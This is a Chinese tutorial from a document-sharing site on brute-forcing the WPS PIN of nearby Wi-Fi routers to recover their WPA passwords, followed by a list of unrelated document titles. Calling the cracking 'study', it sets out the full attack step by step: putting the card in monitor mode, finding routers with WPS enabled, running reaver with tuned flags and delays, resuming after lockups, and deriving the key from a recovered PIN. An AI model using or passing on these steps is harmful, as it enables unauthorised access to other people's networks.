pin技巧
6页1、学习前需要先下载两个软件,一个是虚拟机、一个是xiaopangOS系统。如果你已经有了请略过,没有的给你们提供两个下载地址。1.虚拟机下载地址:http:/ PIN 码PJ 简单扫盲:PIN 码分前4 和后4,先破前4 只有最多一万个组合,破后4 中的前3 只有一千个组合,一共就是一万一千个密码组合。 10 的4 次方+10 的3 次方=11000 个密码组合。当reaver 确定前4 位PIN 密码后,其任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码!学习过程1.在虚拟机找到点击打开。如果电脑装有多个无线网卡,请先发指令ifconfig -a 确认你用哪一个网卡WLAN0 或是WLAN1(下面的指令都是以单一网卡WLAN0 为例)2.出现root Shell 窗口。敲入第一条命令“ifconfig wlan0 up” 加载usb 网卡。接下来“airmon-ng start wlan0” 监听模式已激活到了mon0。下图如果出现下图情形则是网卡没有正确加载,8187 驱动RF-kill 的参考后记1 解决问题。3.第二条命令“airodum
2、p-ng mon0” 查看周边路由/AP 的信息。记录下你要学习的路由MAC 地址。提供几个查看可以使用PIN 码学习路由的方法。特别提示:只有AP 开启了WPS、QSS 功能,才可以用PIN 法学习PSK 密码!如何查看AP 是否开了WPS、QSS 呢提供几个小方法?a) reaver1.3 下使用使用命令walsh -i mon0-C 查看针对xiaopangOS3.2 版本b) reaver1.4 下用新的指令:WASH -i mon0 -C C 是大写 在wps locked 一项中有显示的。c) WIN7 下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器按钮也可以连接”,就确认此AP 开了WPS、QSS。d) 在螃蟹软件中可用网络模式下带N,G 的这个不是很准最准确的是下面这个选项点击pin 输入配置,选择接入点,哈哈出来了吧,这里面都是可以学习的目标。需要注意的是,查看后面有的是不支持pin 码连接的,这样的就别弄了,后果你知道。1. 重新开启一个root Shell 窗口,第三条命令“reaver -i mon0 -b MAC -a -S -vv”
3、抓PIN码。注意,MAC 中冒号不可省略,MAC 地址的字母大小写均可,-S 是大写字母, -vv是两个V 不是W!-i 监听后接口名称-b 目标mac 地址-a 自动检测目标AP 最佳配置-S 使用最小的DH key(可以提高PJ 速度)-vv 显示更多的非严重警告-d 即delay 每穷举一次的闲置时间 预设为1 秒-t 即timeout 每次穷举等待反馈的最长时间-c 指定频道可以方便找到信号,如-c1 指定1 频道,大家查看自己的目标频道做相应修改(非TP-LINK 路由推荐d9 t9 参数防止路由僵死reaver -i mon0 -b MAC -a -S d9 t9 -vv)小结-学习时应因状况调整参数(-c 后面都已目标频道为1 作为例子)目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t .5 -c 1目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1学习开始了,然后就是漫长的等待。如果信
4、号好的话2-4 小时内进度走到100%你就会有惊喜发现。PIN 破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN 码 或 timeout)。AP 关闭了WPS、或者没有QSS 滴,会出现WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)5如果出现超长的WPA PSK 可以使用第四条命令“reaver i mon0 b MAC p WPA PSK”MAC 为目标的mac 地址,WPA PSK 为获取到的超长密码。作用是将指定的pin 码获取wpa 密码psk。6.常用命令截图:7.不是所有的路由都支持pin 学习。AP 关闭了WPS、或者没有QSS 滴,会出现WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)学习过程中也可随时随地按Ctrl+C 终止PJ,重复同一个PIN 码 或 timeout 可终止,reaver会自动保存进度。保存进度后重复第2-4 项内容,先看看AP 信号强弱或是否
5、关机,继续学习,则重复命令reaver -i mon0 -b MAC -vv 这条指令下达后,会让你选y 或n,选y 后就继续了。当reaver 确定前4 位PIN 密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了(总共一万一千个密码)。这个时候离成功就差一步之遥了,呵呵hold 住哦!小技巧:只要Root Shell 窗口不关闭,按方向键的上下会出现你输入过的命令方便调用。8.虚拟机中快照的保存方法找到这两个图标,第一个是保存快照。第二个图标是加载上一次的快照。快照的作用:类似迅雷的断点续传,可以保存上次学习的进度,防止目标pin 僵死,无法继续前功尽弃,这是光盘启动、u 盘启动、硬盘启动都无法避免的。而虚拟机则可为自己上一份保险。载入快照后如果无法继续,可以尝试先卸载掉usb 网卡,然后重新加载。然后在开启窗口继续上次的学习。学习过程中也可随时随地按Ctrl+C 终止PJ,重复同一个PIN 码 或timeou t 可终止,reaver 会自动保存进度。reaver -i mon0 -b MAC -vv 这条指令下达后,会让你选y 或n,选y
6、后就继续了。9.光盘启动、u 盘/硬盘启动保存学习进度的方法reaver1.3 的保存路径:打开桌面最后边一个图标xfec 定位到/etc/reaver 下,有一个wpc后缀的文件,名字是你学习的目标的mac 地址,复制到你的U 盘,路径是/mnt/sdb1(一般是这个,自己找找,要是没有东西就右键mount),以后重启到xiaopanOS,把这文件复制到原来的路径,再试试,可以载入进度了!o(_)o 哈哈reaver1.4 的保存路径:保存目录:/usr/local/etc/reaver如果xfe 文件管理器未获得ROOT 权限。请先运行root shell 后输入xfe 即可获得root 权限。保存方法同上。下次重启动后,再手工复制到/etc/reaver/ 目录下即可MAC 地址.wpc 其实是个文本文件,格式与破密用字典酷似,其第一行和第二行,分别是4 位数和3 位数的指示位置数(+4)。如果进度到99.9%后,AP 死机,可打开它,总共1000个3 位数,找出剩余的十几个PIN 码,用QSS、WPS 客户端软件,手动测试、破密。如果是跑了99.99%死机, 意味吗? 你懂的吧
7、? 最后一个PIN 就是。以下这个命令是指定PIN 码,获得WPA 密码PSKreaver -i mon0 -b MAC -p PIN8 位数如果上述措施不后,仍不见PSK 密码,可能因软件原因,漏码了!需要重新跑后三位数!(前四位正确的话)reaver -i mon0 -b MAC -p PIN 前4 位数编后语:本文后期引用了论坛的部分作者的截图和文字,在此表示对原作者的感谢。希望不要引起版权纠纷,O(_)O 哈哈。希望小鸟们能从本文中找到合适方法与技巧。如果看过本文后你还无法领悟,那只能说明我这个菜鸟老师水平太低了,请您移步另请高教吧,本文不接受任何中差评!_后记:(不断根据论坛各位同学的资料更新中,希望提供参考资料)1.遇见8187 驱动RF-kill 的xiaopanos 对8187 的网卡支持不是太好,有时会出现驱动加载不了,就是输入第一条命令后出现operation not possible due to RF-kill,我想大部分人也遇到过把。新版本0.34 使用命令rfkill unblock all 解决这个问题,容易出现问题的是0.3.2 版本的。第一种尝试的解决
《pin技巧》由会员桔****分享,可在线阅读,更多相关《pin技巧》请在金锄头文库上搜索。
心理学毕业论文选题
项目部工作职责
电商促销类型大全
2021年5月教师个人总结范文
中学工会的工作总结范文
2023医院护士辞职申请书(多篇)
探析初中数学情境教学的问题及有效对策
2021年一中教师业务档案保管制度.doc
电梯钢结构施工方案
听前、听中、听后设计
传承中华魂放飞青春梦
化妆品添加剂项目可行性研究报告立项申请
灯具采购及安装招标资料(全套)
三角立体台卡、桌卡、席卡模板
南开大学21秋《财产保险》离线作业2答案第66期
w工业废渣综合利用生产环保粉粒建筑材料专利技术推广项目施工组织
全面解析会销体验店六大成功要素
人教版小学数学二年级上册《简单推理》说课稿
2023教师五四青年节教师演讲稿集锦九篇
2017年普通高等学校招生全国统一考试(海南地理)
2024-03-07 87页
2023-12-26 16页
2023-12-26 28页
2023-07-21 7页
2023-07-21 3页
2023-07-21 14页
2023-07-21 3页
2023-07-21 30页
2023-07-21 34页
2023-07-21 15页